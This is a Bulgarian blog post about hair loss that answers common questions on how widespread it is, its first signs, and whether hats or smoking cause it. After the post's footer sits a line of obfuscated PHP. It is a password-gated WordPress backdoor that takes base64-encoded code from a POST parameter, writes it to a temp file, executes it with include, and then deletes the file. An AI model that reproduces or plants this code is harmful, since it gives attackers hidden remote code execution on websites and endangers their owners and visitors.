5 любопитни факта за косопада | Косопад

Любопитни факти за оплешивяването

Колко хора страдат от косопад?

За съжаление, отговорът на този въпрос не е много приятен. Според изследванията на асоциацията по косопад на САЩ, над 90 % от мъжете и 55 % от жените имат подобни проблеми в определени периоди на своя живот. Степента на заболяването се развива в различна степен при отделните индивиди, като понякога се наблюдава изтъняване на косата, а друг път се стига до пълно оплешивяване.

косопад и оплешивяване

Типични фази на косопад и оплешивяване

Появата на косопад може ли да се тълкува като показател за здравето?

В някои от случаите не се откриват признаци, които показват влошаване на здравословното състояние като цяло. В други обаче косопадът е причинен именно от здравословни проблеми, а при някои болести е единственият симптом. При всички положения, ако забележите нещо нередно незабавно потърсете лекарска помощ. Още повече, че олисяването на темето определено докарва неприятни преживявания и силна тревога.

Кои са първите признаци на косопад?

Те са различни при различните видове. Основните и най – характерни от тях са образуване на кръгли петна, изтегляне на косата при слепоочията, изтъняване на косъма и много други. Характерен симптом е и наличието на голямо количество изпопадали косми по спалното бельо след ставане от сън.

Носенето на шапка причинява ли косопад?

Специалистите са категорични, че носенето на шапка в никакъв случай не може да е причина за косопад. Единствено може да причини механично увреждане, ако е много стегната.

Има ли връзка между тютюнопушене и косопад?

Съвременната наука все още няма категоричен отговор на този въпрос. Все пак последните изследвания доказват, че цигарите по някакъв начин все пак влияят и донякъде стават за оплешивяване. Според основната теория, пушенето предизвиква преждевременно остаряване на тялото, включително и на косата.

18. април 2013 14:03:12 от Косопад
Категории: Любопитно за косопада | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}